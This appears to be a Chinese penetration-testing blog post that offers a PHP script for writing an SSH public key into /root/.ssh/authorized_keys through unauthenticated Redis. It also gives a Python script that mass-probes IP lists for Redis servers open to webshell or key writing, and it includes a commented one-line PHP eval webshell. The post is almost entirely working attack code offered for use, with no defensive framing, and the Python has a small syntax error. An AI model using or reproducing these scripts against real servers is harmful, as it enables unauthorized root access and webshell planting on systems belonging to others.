/ 渗透测试

Redis未授权写shell脚本

最近因为需要,一个自动的redis写shell脚本

<?php
   //连接本地的 Redis 服务
   $redis = new Redis();
   fwrite(STDOUT, "Target Ip: \n");
   $target = fgets(STDIN);
   $redis->connect($target, 6379);
   # 非未授权时使用密码连接
   #$auth = $redis->auth('');
   #var_dump($auth);
   $dir = $redis->config("GET","dir")["dir"];
   echo $dir;
   $redis->config("SET", "dir", "/root/.ssh");
   $redis->config("SET", "dbfilename", "authorized_keys");
   fwrite(STDOUT, "Enter KeyName: \n");
   $keyname = trim(fgets(STDIN));
   echo $keyname;
   fwrite(STDOUT, "Enter PublicKey: \n");
   $public_key = fgets(STDIN);
   $redis->set($keyname, "\n\n\n".$public_key."\n\n\n");
   $redis->save();
?>

自动化探测ip是否可以写webshell或公私钥

from multiprocessing import Pool
import os, time, random
import redis

ip_ssh_failed = []
ip_ssh_success = []
ip_web_success = []
ip_web_failed = []

def RedisWebShellTry(ip):
   global ip_web_success
   global ip_web_failed
   try:
      r = redis.Redis(host=ip, port=6379, password="")
      pwd = r.config_get("dir")['dir']
      testresult = r.config_set("dir", "")
      # r.config_set("dbfilename","phpinfo.php")
      # r.set("xxxxx","<?php @eval($_POST[sqvds]); ?>")
      if testresult:
         print("[*] " + ip + "Test Successful, Current Dir: ", pwd)
         ip_web_success.append(ip)
      else:
         ip_web_failed.append(ip)
         print("[*] "+ ip + " Test Web Failed, I can not set the dir")
   except Exception:
      ip_web_failed.append(ip)
      print("[*] "+ ip + " Test Web Failed, I can not set the dir")

def RedisSSHTry(ip):
   try:
      r = redis.Redis(host=ip, port=6379, password="")
      pwd = r.config_get("dir")['dir']
      setroot = r.config_set("dir","/root/.ssh")
      if setroot:
         ip_ssh_success.append(ip)
         print("[*] "+ ip +" Test SSH Successful")
      else:
         ip_ssh_failed.append(ip)
         print("[*] "+ ip + " Test SSH Failed")
   except Exception as e:
      ip_ssh_failed.append(ip)
      print("[*] "+ ip + " Test SSH Failed")

def Test(ip_list, type="web"):
   count = len(ip_list)
   p = Pool(count)
   if type == "web":
      for ip in ip_list:
         p.apply_async(RedisWebShellTry, args=(ip,))
   elif type == "ssh":
      for ip in ip_list:
         p.apply_async(RedisSSHTry, args=(ip,))
   p.close()
   p.join()
   if type == "web:
      print("web_success: ", ip_web_success)
      print("web_failed: ", ip_web_failed)
   elif type == "ssh":
      print("ssh_success: ", ip_ssh_success)
      print("ssh_failed: ", ip_ssh_failed)

if __name__ == '__main__':
   ip = ['192.168.9.12', '192.168.9.13']
   Test(ip, "ssh")